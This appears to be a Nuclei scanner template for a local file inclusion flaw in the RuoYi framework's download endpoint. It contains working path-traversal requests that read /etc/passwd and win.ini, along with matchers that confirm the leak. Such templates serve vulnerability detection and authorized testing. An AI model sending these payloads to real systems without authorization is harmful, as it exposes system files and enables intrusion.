id: RuoYi-fileInclude

info:
  name: 若依本地文件包含
  author: str1am
  severity: high
  tags: ruoyi,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
      - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"

    matchers-condition: or
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: body
        words:
          - "bit app support"
          - "extensions"
        condition: and